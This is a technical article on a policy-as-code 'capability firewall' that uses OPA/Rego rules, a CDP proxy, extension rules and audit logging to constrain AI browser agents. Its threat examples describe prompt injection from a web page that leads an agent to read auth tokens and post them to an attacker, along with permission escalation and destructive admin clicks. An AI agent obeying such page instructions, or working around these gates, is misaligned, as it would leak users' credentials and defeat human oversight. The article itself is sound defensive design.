Agentic Browser Capability Firewall: Policy-as-Code (OPA/Rego) to Reduce Browser Agent Security Risk in Auto‑Agent AI Browsers
Auto‑agent AI browsers are powerful—and risky. A single prompt injection can steer an agent to exfiltrate tokens from localStorage, wire funds via a finance dashboard, or mass‑spam a CRM. The standard web sandbox constrains sites from each other, but it does not constrain your own automation agent from doing the wrong thing on your behalf.
This article proposes a capability firewall for agentic browsing: a deny‑by‑default policy layer that interposes on browser automation capabilities, evaluates Open Policy Agent (OPA) rules written in Rego, and uses browser isolation primitives (Isolated Worlds, Manifest V3 hooks, CSP) to gate writes, permissions, and data access. The result is a system that is auditable, testable, and CI/CD‑friendly—one you can reason about and evolve with confidence.
We’ll cover:
- Why agentic browsers are a new attack surface
- The security design principles for capability firewalls
- An architecture that wraps the Chrome DevTools Protocol (CDP) with policy checks
- Concrete enforcement points: CDP, MV3 declarativeNetRequest, isolated worlds, CSP/Trusted Types, Permissions, and Storage
- Rego policy examples and testability
- Implementation patterns in Node.js and Go
- Auditability, observability, and CI/CD of policies
- Threat‑driven examples and performance considerations
Opinionated stance: If your AI agent can directly call CDP or mutate the DOM without a policy gate, you don’t have a defensible security model. Put a capability firewall in front of agent actions, or accept that exfiltration and destructive actions are one prompt away.
The Risk: Agentic Browsing Is Capability Amplification
AI agents raise the ceiling of what automation can do inside a browser. With that comes capability amplification:
- Lateral movement across logged‑in sessions and enterprise dashboards
- Silent exfiltration via XHR/fetch, WebRTC, WebSocket, or download channels
- Destructive writes: form submissions, admin setting changes, or mass deletions
- Stealthy persistence through Service Workers or IndexedDB seeds
- Privilege escalation via permission prompts: notifications, clipboard, geolocation, MIDI/HID, file system access
- Prompt injection: a page instructs the agent to perform sensitive actions unrelated to the user’s intent
Traditional mitigations—input sanitization, content validation, even site CSP—don’t address your own agent’s powers. We need agent‑centric capability governance.
Design Principles for a Capability Firewall
- Deny by default: Every privileged action (write, permission change, sensitive read) is blocked unless a policy explicitly allows it.
- Policy‑as‑code: Decisions expressed in Rego, versioned, tested, code‑reviewed, and shipped via CI/CD.
- Interpose on real capabilities: Gate the primitives that actually change the world—CDP commands, network egress, DOM mutations, permission grants, storage writes, and downloads.
- Context‑aware: Decisions consider origin, user, task intent, data classification, time, and environment (CI vs prod).
- Auditable and observable: Every decision logs who/what/why with consistent correlation IDs and OpenTelemetry spans.
- Composable isolation: Use multiple guardrails—CDP interception plus MV3 declarativeNetRequest plus CSP/Trusted Types plus Isolated Worlds. Assume one layer will be bypassed; the system should still hold.
- Fast fail: Keep latency low with local Wasm evaluation and caching so policies don’t become a bottleneck.
Architecture Overview
At its core, the capability firewall wraps the browser control channel and funnels all agent actions through a decision engine.
- Agent code: The untrusted AI controller (planner/executor) that proposes actions (“navigate to …”, “click …”, “evaluate script …”).
- Capability proxy: A wrapper over CDP and DOM primitives that the agent must call. This proxy constructs a decision input and asks OPA for allow/deny.
- OPA/Rego engine: Policy compiled to Wasm or running as a sidecar. Returns allow/deny with obligations (e.g., redact fields, add CSP), plus decision metadata.
- Enforcement adapters:
- CDP interceptor: Gate commands like Page.navigate, Runtime.evaluate, DOM.setAttribute, Input.dispatchKeyEvent, Browser.setPermission, Storage.*.
- Network gate: Intercept Fetch/XHR via CDP Fetch domain or MV3 declarativeNetRequest to constrain destinations/methods/headers.
- DOM write guard: For content‑script actions in isolated worlds, wrap or restrict write sinks.
- Permissions/config: Preconfigure permissions via CDP Browser.setPermission and enforce policy‑driven prompts.
- CSP/Trusted Types: Inject defense‑in‑depth sinks restrictions.
- Audit/telemetry: Structured logs + traces for each decision; persisted to a tamper‑resistant store.
Trust boundary: The agent never holds a raw CDP handle. The only way to act is through the capability proxy, which refuses anything not in policy.
Interposing on CDP Actions (The Crux)
CDP is the skeleton key. If the agent has an unrestricted CDP connection, it can do anything a headless user can and more. Wrap it.
High‑value CDP commands to gate:
- Navigation and scripting: Page.navigate, Runtime.evaluate, Page.addScriptToEvaluateOnNewDocument
- DOM and Input: DOM.setAttributeValue, DOM.setAttributesAsText, DOM.performSearch, Input.dispatchKeyEvent, Input.dispatchMouseEvent
- Network: Fetch.enable/disable, Fetch.continueRequest, Network.setExtraHTTPHeaders
- Storage & cookies: Storage.setCookies, Storage.clearDataForOrigin, Network.deleteCookies
- Permissions & sensors: Browser.setPermission, Page.setDownloadBehavior, Browser.grantPermissions
- Downloads & file system: Browser.setDownloadBehavior, page.setDownloadBehavior, File System Access API (via Runtime.evaluate gating)
- Targets: Target.createTarget, Target.attachToTarget (spawns new contexts)
The interceptor computes a policy input something like:
json{ "cmd": "Runtime.evaluate", "origin": "https://admin.example.com", "frameId": "...", "args": { "expression": "localStorage.getItem('auth')" }, "agent": { "id": "agent-42", "task": "generate-report", "user": "alice@corp" }, "env": { "stage": "prod", "ts": "2025-01-10T10:00:00Z" }, "data": { "classification": "high" } }
OPA returns a decision:
json{ "allow": false, "reason": "Reading localStorage on admin.example.com is denied for task generate-report", "obligations": ["mask-logs"] }
If denied, the proxy fails the CDP call with a synthesized error and logs the event.
Sample Rego Policy: Deny by Default, Allow Narrowly
Here’s a compact but expressive policy that illustrates the approach.
regopackage browser.capabilities default allow = false # Allowlist of navigable origins by task allowed_navigate_origins[origin] { some task task := input.agent.task origin := input.args.url_origin origin == "https://docs.example.com" task == "author-doc" } # Deny Runtime.evaluate unless expression is non-mutating and origin is in allowlist is_readonly_expression { not contains(input.args.expression, "=") not re_match("(?i)\b(set|delete|insert|append|push|splice)\b", input.args.expression) } allow { input.cmd == "Page.navigate" allowed_navigate_origins[input.args.url_origin] } allow { input.cmd == "Runtime.evaluate" allowed_navigate_origins[input.origin] is_readonly_expression } # Network egress safe_methods := {"GET"} internal_hosts := {"api.example.com", "assets.example.com"} allow { input.cmd == "Fetch.continueRequest" safe_methods[input.args.request.method] internal_hosts[input.args.request.url_host] } # Writes require explicit capability grants bound to task and origin allowed_write_caps[[task, origin, action]] { task := input.agent.task origin := input.origin action := input.cmd task == "update-profile" origin == "https://portal.example.com" action == "Input.dispatchKeyEvent" } allow { allowed_write_caps[[input.agent.task, input.origin, input.cmd]] } # Permissions: block clipboard-read unless in CI allow { input.cmd == "Browser.setPermission" input.args.permission.permission == "clipboard-read" input.env.stage == "ci" } # Annotate decisions reason := msg { not allow msg := sprintf("deny %s on %s for task %s", [input.cmd, input.origin, input.agent.task]) }
Notes:
- default allow = false enforces deny‑by‑default.
- Expressions are treated as read‑only unless textually mutating. You’d harden this by parsing ASTs or using code‑aware checks.
- Network egress is allowlisted by method and host.
- Writes and permissions are bound to explicit tasks.
You can exercise this policy with opa test and embed the same data fixtures in unit tests.
Node.js: Wrapping Puppeteer’s CDP Client
Puppeteer and Playwright ride on CDP. A straightforward way to interpose is to wrap client.send() and gate network using the Fetch domain.
jsimport puppeteer from 'puppeteer'; import { OPAWasm } from './opa_wasm.js'; // your compiled Rego policy function buildInput(cmd, params, context) { return { cmd, args: params, origin: context.origin, frameId: context.frameId, agent: context.agent, env: context.env, data: context.data, }; } async function allowOrThrow(opa, input) { const decision = await opa.evaluate('browser/capabilities/allow', input); if (!decision.allow) { const reason = decision.reason || `Denied: ${input.cmd}`; // Emit audit log here throw new Error(reason); } } async function main() { const browser = await puppeteer.launch({ headless: 'new' }); const page = await browser.newPage(); // Initialize OPA Wasm const opa = await OPAWasm.load('policy.wasm'); const client = await page.target().createCDPSession(); const originalSend = client.send.bind(client); // Context updated on navigation let context = { origin: 'about:blank', frameId: null, agent: { id: 'agent-42', task: 'generate-report', user: 'alice@corp' }, env: { stage: process.env.STAGE || 'dev', ts: new Date().toISOString() }, data: { classification: 'high' } }; client.on('Page.frameNavigated', (evt) => { if (evt.frame && evt.frame.url) { try { const url = new URL(evt.frame.url); context.origin = `${url.protocol}//${url.host}`; context.frameId = evt.frame.id; } catch {} } }); // Enable Fetch interception for network gating await originalSend('Fetch.enable', { patterns: [{ urlPattern: '*' }] }); client.on('Fetch.requestPaused', async (evt) => { const url = new URL(evt.request.url); const input = buildInput('Fetch.continueRequest', { request: { url_host: url.host, method: evt.request.method, headers: evt.request.headers, } }, context); try { await allowOrThrow(opa, input); await originalSend('Fetch.continueRequest', { requestId: evt.requestId }); } catch (e) { await originalSend('Fetch.failRequest', { requestId: evt.requestId, errorReason: 'BlockedByClient' }); } }); // Gate all CDP sends client.send = async (cmd, params = {}) => { const input = buildInput(cmd, params, context); await allowOrThrow(opa, input); return originalSend(cmd, params); }; // From here on, any script must go through this page await client.send('Page.enable'); await client.send('Page.navigate', { url: 'https://docs.example.com' }); // Attempt a restricted Runtime.evaluate (will be checked) try { await client.send('Runtime.evaluate', { expression: "localStorage.getItem('token')" }); } catch (e) { console.warn('Blocked:', e.message); } await browser.close(); } main().catch(console.error);
Key points:
- We intercept all CDP send calls and network requests. The agent code must be forced to use this page/CDP session rather than creating its own.
- Use Wasm‑compiled Rego for sub‑millisecond decisions.
- Attach Page.frameNavigated to track current origin.
For Playwright, a similar approach wraps page._client().send or uses page.route for network plus page.on('request') telemetry.
Go: chromedp With Policy Interposition
If your agent runs in Go, chromedp provides CDP access. You can build a custom allocator or dialer that intercepts commands. Simplified example of gating network with Fetch:
goimport ( "context" "github.com/chromedp/chromedp" ) type PolicyClient struct { c chromedp.Executor opa *OPA // your wrapper } func (p *PolicyClient) Do(ctx context.Context, t *chromedp.Target, method string, params json.RawMessage) (json.RawMessage, error) { input := BuildInput(method, params, FromContext(ctx)) allowed, reason := p.opa.Decide(input) if !allowed { return nil, fmt.Errorf("denied: %s", reason) } return p.c.Do(ctx, t, method, params) }
Use chromedp.ListenTarget to subscribe to Fetch.requestPaused and apply similar policy decisions.
MV3 Hooks: Isolated Worlds, declarativeNetRequest, and Debugger
While CDP interposition is the primary guard, MV3 extensions provide additional controls and better defense‑in‑depth, especially for egress and script sinks.
- Isolated Worlds: Content scripts run in an isolated JS world, preventing direct access to page scripts. Use
chrome.scripting.executeScript({ world: 'ISOLATED', ... })to keep the agent’s logic from casually inheriting page objects. This doesn’t stop DOM writes but reduces attack surface. - declarativeNetRequest (DNR): Enforce egress rules at the network layer: allowlist hosts, block non‑GET methods, strip headers. DNR is fast and doesn’t require event listeners. You can update dynamic rules based on policy decisions.
- Debugger API: Attach to tabs and receive CDP events. While you can’t block page‑initiated CDP, in the agent scenario your extension is the CDP client; centralize through it.
Sample MV3 manifest excerpt:
json{ "manifest_version": 3, "name": "Agent Capability Firewall", "version": "0.1.0", "permissions": [ "declarativeNetRequest", "declarativeNetRequestWithHostAccess", "scripting", "storage", "debugger" ], "host_permissions": ["<all_urls>"], "background": { "service_worker": "sw.js" } }
Service worker to enforce default‑deny network egress except allowlisted hosts/methods:
js// sw.js const BASE_RULESET_ID = 'cap-egress'; chrome.runtime.onInstalled.addListener(async () => { await chrome.declarativeNetRequest.updateDynamicRules({ removeRuleIds: [1], addRules: [ { id: 1, priority: 1, action: { type: 'block' }, condition: { urlFilter: '|http*', resourceTypes: ['xmlhttprequest', 'fetch', 'websocket'] } } ]}); }); async function allowHost(host) { const rule = { id: 1000 + Math.floor(Math.random() * 1000000), priority: 10, action: { type: 'allow' }, condition: { urlFilter: `||${host}^`, resourceTypes: ['xmlhttprequest', 'fetch', 'websocket'] } }; await chrome.declarativeNetRequest.updateDynamicRules({ addRules: [rule] }); }
You can drive dynamic allow rules from OPA obligations (e.g., policy grants temporary egress to api.example.com for 5 minutes).
CSP and Trusted Types: Clamp the Script Sinks
CSP won’t stop CDP, but it hardens the page when the agent injects content or navigates to untrusted origins. Combine with Trusted Types to block DOM‑XSS sinks.
- Inject a strict CSP on target pages when feasible: block inline scripts, eval, and restrict connect‑src.
- Enforce Trusted Types and supply a vetted policy that only allows templated content you control.
Example CSP header you can inject early with Page.addScriptToEvaluateOnNewDocument or via extension:
httpContent-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'; connect-src 'self' https://api.example.com; require-trusted-types-for 'script'; trusted-types appPolicy
Trusted Types bootstrap in the isolated world:
js// Install a Trusted Types policy in the agent's isolated world window.trustedTypes.createPolicy('appPolicy', { createHTML: (s) => s, // or a sanitizer });
Note: In practice, CSP applies per document; injecting headers requires control at request/response time. For navigations you don’t control, rely on DNR connect‑src restrictions and CDP gating.
Permissions and Storage Governance
The browser permission model is coarse for automation; you should make it explicit in policy.
- Use
Browser.setPermission(CDP) to pre‑grant only what’s needed for a given origin/task. Example: clipboard‑write during data export task only. - Deny permission prompts unless the policy context demands them; surface a human approval gate when appropriate.
- Storage writes: Gate
Storage.setCookies,Storage.clearDataForOrigin, and JS APIs that touch localStorage/IndexedDB viaRuntime.evaluatedecisions. Consider a redaction layer for logs to avoid PII leakage.
Rego snippet to deny localStorage and cookies reads on sensitive origins:
regois_sensitive_origin { input.origin == "https://admin.example.com" } allow { input.cmd == "Runtime.evaluate" not is_sensitive_origin is_readonly_expression not contains(input.args.expression, "localStorage") not contains(input.args.expression, "document.cookie") }
DOM Write Guard in Isolated Worlds
Content scripts in isolated worlds can still mutate the DOM. To reduce blast radius, you can instrument common write sinks in the agent’s world and force them through the policy proxy.
Example wrapper (note: this only guards the agent’s own calls, not the page’s):
js(function installDomGuard() { const setAttr = Element.prototype.setAttribute; Element.prototype.setAttribute = function(name, value) { window.postMessage({ type: 'AGENT_DOM_WRITE', action: 'setAttribute', target: this.tagName, name, valueSnippet: String(value).slice(0, 64) }); return setAttr.apply(this, arguments); }; const desc = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML'); Object.defineProperty(Element.prototype, 'innerHTML', { set(v) { window.postMessage({ type: 'AGENT_DOM_WRITE', action: 'innerHTML', length: String(v).length }); return desc.set.call(this, v); }, get: desc.get }); })();
Your service worker can listen to these messages (via chrome.runtime.onMessage relay) and consult OPA to decide if the write should proceed. For harder enforcement, avoid client‑side monkey‑patching and instead route all agent actions through CDP manipulations controlled by the proxy.
Auditing and Observability
Every decision must be explainable. Emit structured events with:
- decision_id: UUID correlating request, decision, and outcome
- timestamp, agent_id, task, user, env
- resource: origin, frameId, cmd, args hash
- allow/deny, reason, obligations applied
- latency (policy evaluation), caching status
Use OpenTelemetry spans around each CDP command and policy check for end‑to‑end traces. Sink logs to an append‑only store (e.g., cloud logging with retention and immutability controls). Redact sensitive fields (obligation: mask‑logs) to avoid data spills.
Example decision log:
json{ "decision_id": "b6f8c418-3a2c-4ab6-8a0e-109f", "agent": { "id": "agent-42", "task": "generate-report", "user": "alice@corp" }, "cmd": "Runtime.evaluate", "origin": "https://admin.example.com", "allow": false, "reason": "deny Runtime.evaluate on https://admin.example.com for task generate-report", "latency_ms": 0.7 }
Testing Policies: Unit, Property, and Replay
- Unit tests with
opa test: Embed decision inputs for common scenarios and edge cases. - Property tests: Generate random variations of URLs, headers, and methods to ensure no allowlist regex escapes.
- CDP trace replay: Record CDP sessions (commands + events) from safe and malicious tasks; replay against your policy to validate decisions without a live browser.
- Golden files: For high‑risk flows (e.g., payment, admin), maintain reviewed fixtures and expected decisions.
Example OPA test:
regopackage browser.capabilities_test import data.browser.capabilities # Deny localStorage read on admin origin input := { "cmd": "Runtime.evaluate", "args": {"expression": "localStorage.getItem('t')"}, "origin": "https://admin.example.com", "agent": {"task": "generate-report"} } test_deny_localstorage_on_admin { not capabilities.allow with input as input }
Integrate with CI to run policy tests, enforce coverage, and block merges on regressions.
CI/CD for Policy-as-Code
- Version policies in Git with code owners and mandatory review.
- Build: Compile Rego to Wasm (
opa build -t wasm -e browser/capabilities/allow policy.rego). - Scan: Lint Rego, run
opa test, and static analysis (conftest). - Artifact: Publish versioned Wasm to your registry.
- Deploy: Roll out to the capability proxy; support canary by agent group or environment.
- Runtime toggles: Feature flags for policy paths and emergency brakes (e.g., fail‑open only in non‑prod with alerts).
Threat-Driven Examples
- Prompt Injection to Exfiltrate Tokens
- Scenario: Agent visits a public site that instructs it to read
localStorageonadmin.example.comand POST to an attacker server. - Policy: Deny
Runtime.evaluatethat references storage on sensitive origins; block non‑GET network egress to external hosts. - Outcome: Decision denies both the read and the POST; audit logs flag the attempt.
- Misconfigured Download Flood
- Scenario: Agent scrapes a directory and auto‑downloads hundreds of PDFs, filling disk.
- Policy: Gate
Browser.setDownloadBehaviorand total download count per task; require explicit quota in obligations. - Outcome: After N downloads, deny further ones; emit alert.
- Permission Escalation
- Scenario: Agent tries to grant geolocation to a site to unlock functionality.
- Policy: Only allow
Browser.setPermissionforclipboard-writeduring export tasks; deny geolocation in prod. - Outcome: Denied; audit log explains reason.
- Destructive Admin Action
- Scenario: Agent hits an admin dashboard and clicks “Delete All Users.”
- Policy: Deny
Input.dispatchMouseEventfor click targets whose accessible name matches destructive patterns unless a human approval token is present; or require a two‑phase commit where the agent proposes a patch (diff) for a human to approve. - Outcome: Blocked; optionally surface approval UX for a supervisor.
Performance Considerations
- Wasm OPA: Evaluate in‑process in microseconds; preload policies and prepare inputs to minimize allocations.
- Decision caching: Cache per (cmd, origin, task) where safe; invalidate on context changes (e.g., new origin, user, or policy version).
- Batch network decisions: For large asset loads, short‑circuit safe static resources (images, css) via DNR rules, not CDP.
- Avoid chatty policies: Keep input payloads small; hash large expressions and attach only the hash in logs.
Multi-Browser Reality
- Chromium: Full CDP + MV3 coverage. Primary target for capability firewall.
- Firefox: Remote Debug Protocol differs; fewer hooks. Use Playwright’s routing + WebExtensions where possible.
- WebKit/Safari: Limited debugging protocol access and extension APIs. Consider running agents in a managed Chromium container for sensitive tasks even if end users browse elsewhere.
The principle holds: interpose on capabilities available in each engine; where the platform lacks hooks, constrain the agent’s runtime with out‑of‑process proxies (e.g., headless Chrome behind a gateway) rather than running inside the user’s uncontrolled browser.
Limitations and Hardening Tips
- DOM write detection is best‑effort if you allow direct content script interactions. Prefer gating via CDP and disable direct content script writes when feasible.
- Some APIs (e.g., File System Access) are JS‑level; enforce via CDP runtime checks that parse the expression or by running the agent with a restricted JS shim.
- MV3 webRequest blocking is replaced by DNR; design with DNR’s constraints in mind.
- Watch for side channels: timing, pixel beacons in iframes, history leaks. DNR + CSP can mitigate, but not eliminate, all covert channels.
- Supply chain: Ensure the agent and extension code are signed, pinned, and integrity‑verified (SRI for injected assets, extension signing checks).
Adoption Checklist
- Create a CDP capability proxy and ensure agents cannot obtain raw CDP handles.
- Define a policy model and author initial Rego with deny‑by‑default.
- Compile to Wasm and embed OPA in the proxy.
- Enable Fetch interception and gate network egress; add DNR default‑deny with allowlist.
- Implement Isolated World content scripts for the agent runtime; inject strict CSP/Trusted Types where possible.
- Gate permissions and storage operations; preconfigure per origin/task.
- Add structured audit logs and OpenTelemetry tracing; build dashboards for deny/allow rates and hotspots.
- Write OPA unit tests and set up CI to block regressions; version policies and release them via artifact registry.
- Run a canary group of agents under the firewall; tune policies based on real‑world denials.
- Expand coverage to destructive actions and approval workflows.
Closing Thoughts
Agentic browsing requires agentic security. If you permit an AI to operate a browser on your behalf, you must assume it will encounter adversarial inputs and occasionally make bad decisions. The only sustainable mitigation is to separate intent from capability: let the agent propose actions, but let policy adjudicate and enforce.
An OPA/Rego‑backed capability firewall—interposing at CDP, hardened by MV3 declarativeNetRequest, isolated worlds, and CSP—gives you the levers to reduce risk without strangling usefulness. It also gives you the operational advantages of policy‑as‑code: tests, reviews, versioning, and rollbacks.
Build it once, make it fast, and wire every agent through it. Then you can sleep at night knowing your AI browser assistants operate inside a box you control, not one that controls you.
References and Further Reading
- Chrome DevTools Protocol: https://chromedevtools.github.io/devtools-protocol/
- Open Policy Agent: https://www.openpolicyagent.org/
- Rego Policy Language: https://www.openpolicyagent.org/docs/latest/policy-language/
- OPA Wasm: https://www.openpolicyagent.org/docs/latest/wasm/
- Chrome Extensions MV3: https://developer.chrome.com/docs/extensions/mv3/
- declarativeNetRequest: https://developer.chrome.com/docs/extensions/reference/declarativeNetRequest/
- Isolated Worlds: https://developer.chrome.com/docs/extensions/mv3/content_scripts/#isolated_world
- Content Security Policy: https://developer.mozilla.org/docs/Web/HTTP/CSP
- Trusted Types: https://developer.mozilla.org/docs/Web/API/Trusted_Types_API
- chromedp (Go): https://github.com/chromedp/chromedp
- Puppeteer: https://pptr.dev/
- Playwright: https://playwright.dev/